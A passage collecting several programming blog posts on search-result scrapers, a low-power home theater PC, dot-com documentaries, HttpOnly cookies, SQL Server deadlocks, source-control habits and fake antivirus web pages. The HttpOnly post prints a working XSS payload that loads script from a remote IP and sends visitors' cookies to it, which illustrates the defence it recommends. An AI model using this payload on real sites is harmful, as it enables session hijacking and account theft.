However, some webmasters attempt to improve their page’s ranking and attract visitors by creating pages with many words but little or no authentic content. Google will take action against domains that try to rank more highly by just showing scraped or other auto-generated pages that don’t add any value to users. Examples include:
- Scraped content. Some webmasters make use of content taken from other, more reputable sites on the assumption that increasing the volume of web pages with random, irrelevant content is a good long-term strategy. Purely scraped content, even from high-quality sources, may not provide any added value to your users without additional useful services or content provided by your site. It’s worthwhile to take the time to create original content that sets your site apart. This will keep your visitors coming back and will provide useful search results.
In 2010, our mailboxes suddenly started overflowing with complaints from users – complaints that they were doing perfectly reasonable Google searches, and ending up on scraper sites that mirrored Stack Overflow content with added advertisements. Even worse, in some cases, the original Stack Overflow question was nowhere to be found in the search results! That’s particularly odd because our attribution terms require linking directly back to us, the canonical source for the question, without nofollow. Google, in indexing the scraped page, cannot avoid seeing that the scraped page links back to the canonical source. This culminated in, of all things, a special browser plug-in that redirects to Stack Overflow from the ripoff sites. How totally depressing. Joel and I thought this was impossible. And I felt like I had personally failed all of you.
The idea that there could be something wrong with Google was inconceivable to me. Google is gravity on the web, an omnipresent constant; blaming Google would be like blaming gravity for my own clumsiness. It wasn’t even an option. I started with the golden rule: it’s always my fault. We did a ton of due diligence on webmasters.stackexchange.com to ensure we weren’t doing anything overtly stupid, and uber-mensch Matt Cutts went out of his way to investigate the hand-vetted search examples contributed in response to my tweet asking for search terms where the scrapers dominated. Issues were found on both sides, and changes were made. Success!
Despite the semi-positive resolution, I was disturbed. If these dime-store scrapers were doing so well and generating so much traffic on the back of our content – how was the rest of the web faring? My enduring faith in the gravitational constant of Google had been shaken. Shaken to the very core.
Throughout my investigation I had nagging doubts that we were seeing serious cracks in the algorithmic search foundations of the house that Google built. But I was afraid to write an article about it for fear I’d be branded an incompetent kook. I wasn’t comfortable sharing that opinion widely, because we might be doing something obviously wrong. Which we tend to do frequently and often. Gravity can’t be wrong. We’re just clumsy … right?
I can’t help noticing that we’re not the only site to have serious problems with Google search results in the last few months. In fact, the drum beat of deteriorating Google search quality has been practically deafening of late:
- Why We Desperately Need a New (and Better) Google
- Dishwashers, and How Google Eats Its Own Tail
- Content Farms: Why Media, Blogs & Google Should Be Worried
- On the increasing uselessness of Google
- Google, Google, Why Hast Thou Forsaken the Manolo?
Anecdotally, my personal search results have also been noticeably worse lately. As part of Christmas shopping for my wife, I searched for “iPhone 4 case” in Google. I had to give up completely on the first two pages of search results as utterly useless, and searched Amazon instead.
People whose opinions I respect have all been echoing the same sentiment — Google, the once essential tool, is somehow losing its edge. The spammers, scrapers, and SEO’ed-to-the-hilt content farms are winning.
Like any sane person, I’m rooting for Google in this battle, and I’d love nothing more than for Google to tweak a few algorithmic knobs and make this entire blog entry moot. Still, this is the first time since 2000 that I can recall Google search quality ever declining, and it has inspired some rather heretical thoughts in me — are we seeing the first signs that algorithmic search has failed as a strategy? Is the next generation of search destined to be less algorithmic and more social?
It’s a scary thing to even entertain, but maybe gravity really is broken.
Revisiting the Home Theater PC
It’s been almost three years since I built my home theater PC. I adore that little machine; it drives all of our family entertainment and serves as a general purpose home media server and streaming box. As I get older, I find that I’m no longer interested in having a home full of PCs whirring away. I only want one PC in my house on all the time, and I want it to be as efficient and versatile as possible.
My old low-power Athlon X2 based HTPC generally worked great, but still struggled with some occasional 1080p content. And when you have a toddler in the house, believe me, you need reliable 1080p playback. Only the finest in children’s entertainment for my spawned process, I say!
When I recently had to transcode Megamind down to 720p to get it to play back without stuttering or pausing at times… I knew my current HTPC’s days were numbered.
(Megamind is hilarious and highly recommended, by the way; it’s far better than its Metacritic and Rotten Tomatoes percentages would seem to indicate.)
Now that Intel has finally released their Sandy Bridge CPUs — the first with integrated GPUs — I was eager to revisit and rebuild. The low power Core i3-2100T is the one I had my eye on, with a miserly TDP of 35 watts. Combine that with a decent Mini-ITX motherboard and a few other essential parts, and you’re good to go:
| Component | Part | Price |
| CPU | Intel Core i3-2100T | $135 |
| Motherboard | ASRock H67M ITX | $100 |
| RAM | Corsair 4GB DDR3 | $45 |
| Case + PSU | Antec ISK 300-65 | $70 |
| HDD | 750GB 2.5″ | $70 |
Now, I am fudging a bit here. This is just the basic level of hardware to get a functional home theater PC. I didn’t actually buy a case, PSU, or even hard drive for that matter; I recycled many of my old existing parts, so my personal outlay was all of 300 bucks. I’m including the fuller part list as courtesy recommendations in case you’re starting from scratch. You also might want to add a Blu-Ray drive, and perhaps a Windows 7 Home Premium license ($99) for its excellent 10-foot Windows Media Center interface.
The magical part here is the extreme level of hardware integration: the CPU has a GPU and memory controller on die, and the motherboard has optical digital out and HDMI out built in. It’s delightfully simple to build and downright cheap. Just assemble it, install your OS of choice (sorry, Apple fans), then plug it into your receiver and television and boot it up.
My results? I’ll just get right to the good part, but please bear in mind each step is about twice as powerful as the one before:
| Year | Cost | Specs | Idle power |
| 2005 | ~$1000 | 512 MB RAM, single core CPU | 80 watts idle |
| 2008 | ~$520 | 2 GB RAM, dual core CPU | 45 watts idle |
| 2011 | ~$420 | 4 GB RAM, dual core CPU + GPU | 22 watts idle |
I know I get way too excited about this stuff, but … holy crap, 22 tesla-lovin’ watts at idle!
The kill-a-watt never lies. To be fair, it’s more like 25 watts idle with torrents in the background. This little box is remarkably efficient; even when playing back a 1080p video it’s not unusual to see CPU usage well under 50%, which equates to around 30-35 watts in practice. Under full, artificial multithreaded Prime95 load, it tops out at an absolute peak of 55 watts.
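For a box that is on all the time, those idle numbers add up over a year. A quick back-of-the-envelope sketch, using the idle wattages from the table above and assuming (as a simplification) that the machine sits at idle around the clock:

```python
HOURS_PER_YEAR = 24 * 365


def annual_kwh(idle_watts: float) -> float:
    """Energy used in a year by a machine drawing idle_watts continuously."""
    return idle_watts * HOURS_PER_YEAR / 1000


# Idle power per build year, taken from the table above.
idle_watts_by_build = {2005: 80, 2008: 45, 2011: 22}

for year, watts in idle_watts_by_build.items():
    print(f"{year} build: {watts} W idle is about {annual_kwh(watts):.0f} kWh per year")
```

Multiply by whatever your utility charges per kWh to turn that into money.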
This is a killer setup, but don’t take my word for it. There is an excruciatingly in-depth review of essentially the same system at Missing Remote, with a particular eye toward home theater duties. Spoiler: they loved the hell out of it too. And it compromises almost nothing in performance, with a Windows Experience score of 5.1 — that would be a solid 5.8 if you factored out desktop Aero performance.
(Also, in case you’re wondering, I intentionally dropped the analog cable tuner. All modern cable is now digital, which means awkward DRM-ed up the wazoo CableCard systems. I’ve cancelled cable altogether; I’d rather take that $60+ per month and use it to support innovative companies who will deliver media through the internet, like Netflix, Hulu, etcetera. Or as I like to call it: the future, unless the media conglomerates with vaults full of cash manage to subvert net neutrality.)
When all is said and done, I have a new always-on, does-anything home theater box that is twice as fast as the one I built in 2008, while consuming less than half the power.
I’ve been a computer nerd since age 8, and I just turned 40. I should be jaded by computer hardware pornography by now, but I still find this progress amazing. At this rate, I can’t wait to find out what my 2014 home theater PC will look like.
Lived Fast, Died Young, Left a Tired Corpse
It’s easy to forget just how crazy things got during the Web 1.0 bubble in 2000. That was over ten years ago. For context, Mark Zuckerberg was all of sixteen when the original web bubble popped.
There’s plenty of evidence that we’re entering another tech bubble. It’s just less visible to people outside the tech industry because there’s no corresponding stock market IPO frenzy. Yet.
There are two films which captured the hyperbole and excess of the original dot com bubble especially well.
The first is the documentary Startup.com. It’s about the prototypical web 1.0 company: one predicated on an idea that made absolutely no sense, which proceeded to flame out in a spectacular and all too typical way for the era. This one just happened to occur on digital film. The govworks.com website described in the documentary, the one that burned through $60 million in 18 months, is now one of those ubiquitous domain squatter pages. A sign of the times, perhaps.
The second film was one I had always wanted to see, but wasn’t able to until a few days ago: Code Rush. For a very long time, Code Rush was almost impossible to find, but the activism of Andy Baio nudged the director to make the film available under Creative Commons. You can now watch it online — and you absolutely should.
Remember when people charged money for a web browser? That was Netscape.
Code Rush is a PBS documentary recorded at Netscape from 1998 - 1999, focusing on the open sourcing of the Netscape code. As the documentary makes painfully clear, this wasn’t an act of strategy so much as an act of desperation. That’s what happens when the company behind the world’s most ubiquitous operating system decides a web browser should be a standard part of the operating system.
Everyone in the documentary knows they’re doomed; in fact, the phrase “we’re doomed” is a common refrain throughout the film. But despite the gallows humor and the dark tone, parts of it are oddly inspiring. These are engineers who are working heroic, impossible schedules for a goal they’re not sure they can achieve — or that they’ll even survive as an organization long enough to even finish.
The most vivid difference between Startup.com and Code Rush is that Netscape, despite all their other mistakes and missteps, didn’t just burn through millions of dollars for no discernable reason. They produced a meaningful legacy:
- Through Netscape Navigator, the original popularization of HTML and the internet itself.
- With the release of the Netscape source code on March 31st, 1998, the unlikely birth of the commercial open source movement.
- Eventually producing the first credible threat to Internet Explorer in the form of Mozilla Firefox 1.0 in 2004.
Do you want money? Fame? Job security? Or do you want to change the world … eventually? Consider how many legendary hackers went on to brilliant careers from Netscape: Jamie Zawinski, Brendan Eich, Stuart Parmenter, Marc Andreessen. The lessons of Netscape live on, even though the company doesn’t. Code Rush is ultimately a meditation on the meaning of work as a programmer.
I’d like to think that when Facebook – the next Google and Microsoft rolled into one – goes public in early 2012, the markets will react rationally. More likely, people will all collectively lose their damn minds again and we’ll be thrust into a newer, bigger, even more insane tech bubble than the first one.
Yes, you will have incredibly lucrative job offers in this bubble. That’s the easy part. As Startup.com and Code Rush illustrate, the hard part is figuring out why you are working all those long hours. Consider carefully, lest the arc of your career mirror that of so many failed tech bubble companies: lived fast, died young, left a tired corpse.
Protecting Your Cookies: HttpOnly
So I have this friend. I’ve told him time and time again how dangerous XSS vulnerabilities are, and how XSS is now the most common of all publicly reported security vulnerabilities — dwarfing old standards like buffer overruns and SQL injection. But will he listen? No. He’s hard headed. He had to go and write his own HTML sanitizer. Because, well, how difficult can it be? How dangerous could this silly little toy scripting language running inside a browser be?
As it turns out, far more dangerous than expected.
To appreciate just how significant XSS hacks have become, think about how much of your life is lived online, and how exactly the websites you log into on a daily basis know who you are. It’s all done with HTTP cookies, right? Those tiny little identifying headers sent up by the browser to the server on your behalf. They’re the keys to your identity as far as the website is concerned.
Most of the time when you accept input from the user the very first thing you do is pass it through an HTML encoder. So tricksy things like:
<script>alert('hello XSS!');</script>
are automagically converted into their harmless encoded equivalents:
&lt;script&gt;alert('hello XSS!');&lt;/script&gt;
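As a minimal sketch of that encoding step, here is how it might look with Python's standard library. The function name is made up for illustration, and note that `html.escape` also encodes quote characters by default, so its output is slightly more aggressive than the encoded line above.

```python
import html


def encode_user_input(text: str) -> str:
    """Encode characters that have special meaning in HTML.

    With quote=True (the default), single and double quotes are encoded
    too, which matters when the text ends up inside an attribute value.
    """
    return html.escape(text, quote=True)


encoded = encode_user_input("<script>alert('hello XSS!');</script>")
print(encoded)
```

The browser renders the encoded text as literal characters instead of executing it as markup.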
In my friend’s defense (not that he deserves any kind of defense) the website he’s working on allows some HTML to be posted by users. It’s part of the design. It’s a difficult scenario, because you can’t just clobber every questionable thing that comes over the wire from the user. You’re put in the uncomfortable position of having to discern good from bad, and decide what to do with the questionable stuff.
Imagine, then, the surprise of my friend when he noticed some enterprising users on his website were logged in as him and happily banging away on the system with full unfettered administrative privileges.
How did this happen? XSS, of course. It all started with this bit of script added to a user’s profile page.
<img src=""http://www.a.com/a.jpg<script type=text/javascript src="http://1.2.3.4:81/xss.js">" /><<img src=""http://www.a.com/a.jpg</script>"
Through clever construction, the malformed URL just manages to squeak past the sanitizer. The final rendered code, when viewed in the browser, loads and executes a script from that remote server. Here’s what that JavaScript looks like:
window.location="http://1.2.3.4:81/r.php?u="+document.links[1].text+"&l="+document.links[1]+"&c="+document.cookie;
That’s right — whoever loads this script-injected user profile page has just unwittingly transmitted their browser cookies to an evil remote server!
As we’ve already established, once someone has your browser cookies for a given website, they essentially have the keys to the kingdom for your identity there. If you don’t believe me, get the Add N Edit cookies extension for Firefox and try it yourself. Log into a website, copy the essential cookie values, then paste them into another browser running on another computer. That’s all it takes. It’s quite an eye opener.
If cookies are so precious, you might find yourself asking why browsers don’t do a better job of protecting their cookies. I know my friend was. Well, there is a way to protect cookies from most malicious JavaScript: HttpOnly cookies.
When you tag a cookie with the HttpOnly flag, it tells the browser that this particular cookie should only be accessed by the server. Any attempt to access the cookie from client script is strictly forbidden. Of course, this presumes you have:
- A modern web browser
- A browser that actually implements HttpOnly correctly
The good news is that most modern browsers do support the HttpOnly flag: Opera 9.5, Internet Explorer 7, and Firefox 3. I’m not sure if the latest versions of Safari do or not. It’s sort of ironic that the HttpOnly flag was pioneered by Microsoft in hoary old Internet Explorer 6 SP1, a browser which isn’t exactly known for its iron-clad security record.
Regardless, HttpOnly cookies are a great idea, and properly implemented, make huge classes of common XSS attacks much harder to pull off. Here’s what a cookie looks like with the HttpOnly flag set:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ig2fac55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: user=t=bfabf0b1c1133a822; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Tue, 26 Aug 2008 10:51:08 GMT
Content-Length: 2838
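The response above came from ASP.NET, but most server-side stacks can set the flag. As a rough sketch, here is one way to build such a header value with Python's standard `http.cookies` module. The cookie name and helper function are hypothetical, and the session value is simply borrowed from the example above.

```python
from http.cookies import SimpleCookie


def build_session_cookie(session_id: str) -> str:
    """Return a Set-Cookie header value with the HttpOnly flag set."""
    cookie = SimpleCookie()
    cookie["session_id"] = session_id          # hypothetical cookie name
    cookie["session_id"]["path"] = "/"
    cookie["session_id"]["httponly"] = True    # hide the cookie from client script
    return cookie["session_id"].OutputString()


header_value = build_session_cookie("ig2fac55")
print("Set-Cookie:", header_value)
```

The attribute order in the printed header may differ from the ASP.NET output; browsers do not care about the order.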
This isn’t exactly news; Scott Hanselman wrote about HttpOnly a while ago. I’m not sure he understood the implications, as he was quick to dismiss it as “slowing down the average script kiddie for 15 seconds”. In his defense, this was way back in 2005. A dark, primitive time. Almost pre YouTube.
HttpOnly cookies can in fact be remarkably effective. Here’s what we know:
- HttpOnly restricts all access to document.cookie in IE7, Firefox 3, and Opera 9.5 (unsure about Safari)
- HttpOnly removes cookie information from the response headers in XMLHttpObject.getAllResponseHeaders() in IE7. It should do the same thing in Firefox, but it doesn’t, because there’s a bug.
- XMLHttpObjects may only be submitted to the domain they originated from, so there is no cross-domain posting of the cookies.
The big security hole, as alluded to above, is that Firefox (and presumably Opera) allow access to the headers through XMLHttpObject. So you could make a trivial JavaScript call back to the local server, get the headers out of the string, and then post that back to an external domain. Not as easy as document.cookie, but hardly a feat of software engineering.
Even with those caveats, I believe HttpOnly cookies are a huge security win. If I — er, I mean, if my friend — had implemented HttpOnly cookies, it would have totally protected his users from the above exploit!
HttpOnly cookies don’t make you immune from XSS cookie theft, but they raise the bar considerably. It’s practically free, a “set it and forget it” setting that’s bound to become increasingly secure over time as more browsers follow the example of IE7 and implement client-side HttpOnly cookie security correctly. If you develop web applications, or you know anyone who develops web applications, make sure they know about HttpOnly cookies.
Now I just need to go tell my friend about them. I’m not sure why I bother. He never listens to me anyway.
(Special thanks to Shawn expert developer Simon for his assistance in constructing this post.)
Deadlocked!
You may have noticed that my posting frequency has declined over the last three weeks. That’s because I’ve been busy building that Stack Overflow thing we talked about.
It’s going well so far. Joel Spolsky also seems to think it’s going well, but he’s one of the founders so he’s clearly biased. For what it’s worth, Robert Scoble was enthused about Stack Overflow, though it did not make him cry. Still, I was humbled by the way Robert picked this up so enthusiastically through the community. I hadn’t contacted him in any way; I myself only found out about his reaction third hand.
That’s not to say everything has been copacetic. One major surprise in the development of Stack Overflow was this recurring and unpredictable gem:
Transaction (Process ID 54) was deadlocked on lock resources with another process and has been chosen as the deadlock victim. Rerun the transaction.
Deadlocks are a classic computer science problem, often taught to computer science students as the Dining Philosophers puzzle.
Five philosophers sit around a circular table. In front of each philosopher is a large plate of rice. The philosophers alternate their time between eating and thinking. There is one chopstick between each philosopher, to their immediate right and left. In order to eat, a given philosopher needs to use both chopsticks. How can you ensure all the philosophers can eat reliably without starving to death?
Point being, you have two processes that both need access to scarce resources that the other controls, so some sort of locking is in order. Do it wrong, and you have a deadlock — everyone starves to death. There are lots of scarce resources in a PC or server, but this deadlock is coming from our database, SQL Server 2005.
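One textbook way to keep the philosophers from starving is to make everyone pick up chopsticks in the same global order, so a cycle of waiting can never form. The sketch below illustrates that classic resource-ordering trick with Python threads. It is not how SQL Server resolves deadlocks, and the function name and parameters are made up for illustration.

```python
import threading


def run_dinner(philosopher_count: int = 5, meals_each: int = 3) -> list:
    """Seat the philosophers, let each eat meals_each times, return the tallies."""
    if philosopher_count < 2:
        raise ValueError("need at least two philosophers to share chopsticks")

    chopsticks = [threading.Lock() for _ in range(philosopher_count)]
    meals_eaten = [0] * philosopher_count

    def dine(seat: int) -> None:
        left = seat
        right = (seat + 1) % philosopher_count
        # Always grab the lower-numbered chopstick first. With one global
        # ordering, no circular chain of waiting philosophers can form.
        first, second = sorted((left, right))
        for _ in range(meals_each):
            with chopsticks[first], chopsticks[second]:
                meals_eaten[seat] += 1  # eating: both chopsticks are held

    threads = [threading.Thread(target=dine, args=(seat,))
               for seat in range(philosopher_count)]
    for thread in threads:
        thread.start()
    for thread in threads:
        thread.join()
    return meals_eaten


print(run_dinner())
```

If every philosopher instead grabbed the left chopstick first, all five could end up holding one chopstick and waiting forever for the other.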
You can attach the profiler to catch the deadlock event and see the actual commands that are deadlocking. I did that, and found there was always one particular SQL command involved:
UPDATE [Posts]
SET [AnswerCount] = @p1, [LastActivityDate] = @p2, [LastActivityUserId] = @p3
WHERE [Id] = @p0
If it detects a deadlock, SQL Server forces one of the deadlocking commands to lose — specifically the one that uses the least resources. The statement on the losing side varied, but in our case the losing deadlock statement was always a really innocuous database read, like so:
SELECT *
FROM [Posts]
WHERE [ParentId] = @p0
(Disclaimer: above SQL is simplified for the purpose of this post). This deadlock perplexed me, on a couple levels.
- How can a read be blocked by a write? What possible contention could there be from merely reading the data? It’s as if one of the dining philosophers happened to glance over at another philosopher’s plate, and the other philosopher, seeing this, screamed “meal viewing deadlock!” and quickly covered his plate with his hands. Yes, it’s ridiculous. I don’t want to eat your food; I just want to look at it.
- We aren’t doing that many writes. Like most web apps, we’re insanely read-heavy. The particular SQL statement you see above only occurs when someone answers a question. As much as I want to believe Stack Overflow will be this massive, rip-roaring success, there just cannot be that many answers flowing through the system in beta. We went through our code with a fine tooth comb, and yep, we’re barely writing anywhere except when users ask a question, edit something, or answer a question.
- What about retries? I find it hard to believe that little write would take so incredibly long that a read would have to wait more than a few milliseconds at most.
If you aren’t eating — modifying data — then how can trivial super-fast reads be blocked on rare writes? We’ve had good results with SQL Server so far, but I found this behavior terribly disappointing. Although these deadlocks were somewhat rare, they still occurred a few times a day, and I’m deeply uncomfortable with errors I don’t fully understand. This is the kind of stuff that quite literally keeps me up at night.
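Since the error message itself says to rerun the transaction, one common mitigation is to retry the losing operation a few times. Here is a minimal sketch of that idea. `DeadlockVictimError` is a hypothetical stand-in for whatever exception your database driver raises for SQL Server error 1205, and the attempt count and delays are arbitrary illustrative values.

```python
import random
import time


class DeadlockVictimError(Exception):
    """Hypothetical stand-in for the driver error raised on SQL Server error 1205."""


def run_with_deadlock_retry(operation, max_attempts=3, base_delay=0.05):
    """Call operation(), retrying when it is chosen as the deadlock victim."""
    for attempt in range(1, max_attempts + 1):
        try:
            return operation()
        except DeadlockVictimError:
            if attempt == max_attempts:
                raise  # out of attempts: let the caller see the failure
            # Back off a little longer each time, with jitter so two
            # colliding callers do not retry in lockstep.
            time.sleep(base_delay * attempt + random.uniform(0, base_delay))


# Demo with a fake query that loses the deadlock twice, then succeeds.
calls = {"count": 0}


def fake_query():
    calls["count"] += 1
    if calls["count"] < 3:
        raise DeadlockVictimError("chosen as the deadlock victim")
    return ["row 1", "row 2"]


rows = run_with_deadlock_retry(fake_query, base_delay=0.01)
print(rows, "after", calls["count"], "attempts")
```

Retrying hides the symptom rather than explaining it, so it is a complement to diagnosing the deadlock, not a substitute.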
I’ll freely admit this could be due to some peculiarities in our code (translated: we suck), and reading through some sample SQL traces of subtle deadlock conditions, it’s certainly possible. We racked our brains and our code, and couldn’t come up with any obvious boneheaded mistakes. While our database is somewhat denormalized, all of our write conditions are relatively rare and hand-optimized to be small and fast. In all honesty, our app is just not all that complex. It ain’t rocket surgery.
If you ever have to troubleshoot database deadlocks, you’ll inevitably discover the NOLOCK table hint. It works like this:
SELECT * FROM [Posts] WITH (NOLOCK) WHERE [ParentId] = @p0
The hint itself is SQL Server syntax, but the idea behind it is not unique to SQL Server: MySQL also offers a read uncommitted isolation level, while Oracle does not permit dirty reads at all. For the hinted table, the query behaves as if the transaction isolation level were read uncommitted, also known as “dirty reads”. It tells the query to use the lowest possible level of locking.
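For what it’s worth, the same behavior can be requested for a whole session rather than table by table. Here’s a minimal sketch, assuming SQL Server and the [Posts] table from the query above; the value assigned to @p0 is a made-up placeholder, not something from our real code.

```sql
-- Hypothetical parameter value, only here so the batch runs on its own.
DECLARE @p0 int;
SET @p0 = 1;

-- Per-table form: the hint applies only to [Posts] in this one query.
SELECT * FROM [Posts] WITH (NOLOCK) WHERE [ParentId] = @p0;

-- Per-session form: every read that follows on this connection
-- is a dirty read until the level is changed again.
SET TRANSACTION ISOLATION LEVEL READ UNCOMMITTED;
SELECT * FROM [Posts] WHERE [ParentId] = @p0;

-- Put the session back on SQL Server's default level.
SET TRANSACTION ISOLATION LEVEL READ COMMITTED;
```

The hint form is the one to reach for when only a handful of queries are known to be safe; the session form changes everything that runs afterward on that connection.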
But is nolock dangerous? Could you end up reading invalid data with read uncommitted on? Yes, in theory. You’ll find no shortage of database architecture astronauts who start dropping ACID science on you and all but pull the building fire alarm when you tell them you want to try nolock. It’s true: the theory is scary. But here’s what I think:
In theory there is no difference between theory and practice. In practice there is.
I would never recommend using nolock as a general “good for what ails you” snake oil fix for any database deadlocking problems you may have. You should try to diagnose the source of the problem first.
But in practice adding nolock to queries that you absolutely know are simple, straightforward read-only affairs never seems to lead to problems. I asked around, and I got advice from a number of people whose opinions and experience I greatly trust and they, to a (wo)man, all told me the same thing: they’ve never seen any adverse reaction when using nolock. As long as you know what you’re doing. One related a story of working with a DBA who told him to add nolock to every query he wrote!
With nolock / read uncommitted / dirty reads, data may be out of date at the time you read it, but it’s never wrong or garbled or corrupted in a way that will crash you. And honestly, most of the time, who cares? If your user profile page is a few seconds out of date, how could that possibly matter?
Adding nolock to every single one of our queries wasn’t really an option. We added it to all the ones that seemed safe, but our use of LINQ to SQL made it difficult to apply the hint selectively.
I’m no DBA, but it seems to me the root of our problem is that the default SQL Server locking strategy is incredibly pessimistic out of the box:
The database philosophically expects there will be many data conflicts; with multiple sessions all trying to change the same data at the same time and corruption will result. To avoid this, Locks are put in place to guard data integrity … there are a few instances though, when this pessimistic heavy lock design is more of a negative than a positive benefit, such as applications that have very heavy read activity with light writes.
Wow, very heavy read activity with light writes. What does that remind me of? Hmm. Oh yes, that damn website we’re building. Fortunately, there is a mode in SQL Server 2005 designed for exactly this scenario: read committed snapshot:
Snapshots rely on an entirely new data change tracking method … more than just a slight logical change, it requires the server to handle the data physically differently. Once this new data change tracking method is enabled, it creates a copy, or snapshot of every data change. By reading these snapshots rather than live data at times of contention, Shared Locks are no longer needed on reads, and overall database performance may increase.
I’m a little disappointed that SQL Server treats our silly little web app like it’s a banking application. I think it’s incredibly telling that a Google search for SQL Server deadlocks returns nearly twice the results of a query for MySQL deadlocks. I’m guessing that MySQL, which grew up on web apps, is much less pessimistic out of the box than SQL Server.
I find that deadlocks are difficult to understand and even more difficult to troubleshoot. Fortunately, it’s easy enough to fix by setting read committed snapshot on the database for our particular workload. But I can’t help thinking our particular database vendor just isn’t as optimistic as they perhaps should be.
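Turning it on is a one-line database setting. A rough sketch follows, assuming SQL Server 2005 or later; [MyAppDb] is a hypothetical database name, and the WITH ROLLBACK IMMEDIATE clause is my own addition for illustration, since the setting cannot take effect while other connections are active in the database.

```sql
-- [MyAppDb] is a placeholder; substitute the real database name.
-- WITH ROLLBACK IMMEDIATE rolls back other sessions' open transactions
-- so the change does not wait on them. Leave it off to wait politely.
ALTER DATABASE [MyAppDb]
SET READ_COMMITTED_SNAPSHOT ON
WITH ROLLBACK IMMEDIATE;

-- Confirm the setting: 1 means read committed snapshot is on.
SELECT name, is_read_committed_snapshot_on
FROM sys.databases
WHERE name = N'MyAppDb';
```

No query changes are needed afterward: reads at the default read committed level start using row versions instead of shared locks. Those versions are kept in tempdb, so it is worth keeping an eye on tempdb usage after the switch.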
Check In Early, Check In Often
I consider this the golden rule of source control:
Check in early, check in often.
Developers who work for long periods — and by long I mean more than a day — without checking anything into source control are setting themselves up for some serious integration headaches down the line. Damon Poole concurs:
Developers often put off checking in. They put it off because they don’t want to affect other people too early and they don’t want to get blamed for breaking the build. But this leads to other problems such as losing work or not being able to go back to previous versions. My rule of thumb is “check-in early and often”, but with the caveat that you have access to private versioning. If a check-in is immediately visible to other users, then you run the risk of introducing immature changes and/or breaking the build.
I’d much rather have small fragments checked in periodically than to go long periods with no idea whatsoever what my coworkers are writing. As far as I’m concerned, if the code isn’t checked into source control, it doesn’t exist. I suppose this is yet another form of Don’t Go Dark; the code is invisible until it exists in the repository in some form.
I’m not proposing developers check in broken code — but I also argue that there’s a big difference between broken code and incomplete code. Isn’t it possible, perhaps even desirable, to write your code and structure your source control tree in such a way that you can check your code in periodically as you’re building it? I’d much rather have empty stubs and basic API skeletons in place than nothing at all. I can integrate my code against stubs. I can do code review on stubs. I can even help you build out the stubs!
But when there’s nothing in source control for days or weeks, and then a giant dollop of code is suddenly dropped on the team’s doorstep — none of that is possible.
Developers who wouldn’t even consider adopting the old-school waterfall method of software development somehow have no problem adopting essentially the very same model when it comes to their source control habits.
Perhaps what we need is a model of software accretion. Start with a tiny fragment of code that does almost nothing. Look on the bright side — code that does nothing can’t have many bugs! Test it, and check it in. Add one more small feature. Test that feature, and check it in. Add another small feature. Test that, and check it in. Daily. Hourly, even. You always have functional software. It may not do much, but it runs. And with every checkin it becomes infinitesimally more functional.
If you learn to check in early and check in often, you’ll have ample time for feedback, integration, and review along the way. And who knows — you might even manage to accrete that pearl of final code that you were looking for, too.
The Perils of FUI: Fake User Interface
As a software developer, tell me if you’ve ever done this:
- Taken a screenshot of something on the desktop
- Opened it in a graphics program
- Gone off to work on something else
- Upon returning to your computer, attempted to click on the screenshot as if it was an actual program.
And let’s not forget the common goating technique where you take a screenshot of someone’s desktop, make it the desktop background, then proceed to hide every UI element on the screen. The anguished cries as users desperately double-triple-quadruple click on pixels that look exactly like real user interfaces can typically be heard for miles.
I bring this up to generate some sympathy. I get fooled by my own FUI — Fake User Interface — at least once a month. If it can happen to us, it can happen to anyone. Which means FUI can be quite dangerous in the wrong hands. Consider Ryan Meray’s story:
Okay, so here’s an interesting one. My girlfriend is researching stuff on lilies, so she’s trying to find the website for the Michigan Regional Lily Society. The website address is http://www.mrls.org/
Feel free and browse there directly, there’s nothing wrong with it. But if you don’t remember the URL, your first response is to Google it. We google and get this:
http://www.google.com/search?q=Michigan+Regional+Lily+Society
Now, if you’re in Firefox, everything is fine. You click that first result, and you get to their website, and you learn about lilies.
However, if you are using IE, be aware, you are about to have a Spyware/Virus alert.
Obviously, the poor Michigan Regional Lily Society has fallen prey to website hackers. (Note that it may have been fixed by the time I’m writing this, but I duplicated everything I’m about to show you.)
The first clever point is that the website appears fine if you navigate there directly. The malicious JavaScript code inserted into the page checks the referer and does something different if you arrive there via a web search engine. This means the people who own the website, and never arrive there through Google, would be scratching their heads, wondering what all the fuss is about. So the hack survives longer.
But if you do arrive at the MRLS site through a search engine, like a huge percentage of the world does, you’re redirected to:
http://scanner.antivir64.com/?aff=1050
The very first thing this page does is minimize the browser (Firefox 3, in this case) and present us with this JavaScript alert:
I’m intentionally juxtaposing the browser and the dialog here, but the browser is way off in the very lower right corner of the display and that dialog is smack dab in the middle of the screen. It is not at all clear that the dialog originated from that web page. It’s a primitive technique, but it is surprisingly effective.
I didn’t have the guts to click OK on that dialog; I clicked the close button. The browser then expanded to show this convincing “real time virus scan”.
The static screenshot does not do it justice; the scrollbar moves, the list of files flies by as they are “scanned”, and the web page rather successfully simulates an ersatz UI somewhere between Windows XP and Windows Vista. Of course, we know this Fake User Interface is completely invalid, because it is running in the browser, not on our PC. You and I may understand that distinction, but what about your parents? Your wife? Your children? Your less technically savvy friends? Will they understand this scary, authentic-looking virus warning coming from an “encrypted secure site” is all a lie?
Honestly, whose PC doesn’t “run slower than normal”? Maybe I would want to know if my computer is infected with Viruses, Adware or Spyware. It’s all part of the culture of fear that security software companies — and let’s be honest, Windows security software companies — cultivate so they can rake in millions of dollars per year hawking their software. The difference here, of course, is that it’s increasingly difficult to tell the good guys from the bad guys. That’s the downside of fear as a selling point: it cuts equally well in both directions.
Woe betide the poor user who is convinced through the trickery of FUI to install this “antivirus” software. The page does its darndest to convince you to run its payload executable. Any click on the page, no matter where, is interpreted as a download request.
The page also attempts a drive-by download, though those have been auto-blocked for years now.
It’s tempting to put this down as yet another iteration of phishing, the forever hack. To be fair, this is exactly the sort of thing web browser phishing filters were designed to prevent. This site was already in the Firefox 3 phishing filter — but it was not caught by the Internet Explorer 7 phishing filter, so I reported it.
I am all for phishing filters as another important line of defense, but like all distributed blacklists, they’re only so effective.
What I’m more concerned about here is how well the user interface was spoofed. The browser FUI was convincing enough to even make me — possibly the world’s most jaded and cynical Windows user — do a bit of a double-take. How do you protect naive users from cleverly designed FUI exploits like this one? Can you imagine your mother doing a web search on flowers — flowers, for God’s sake — clicking on the search results to a totally legitimate website, and correctly navigating the resulting maze of fake UI, spurious javascript alerts, and download dialogs?
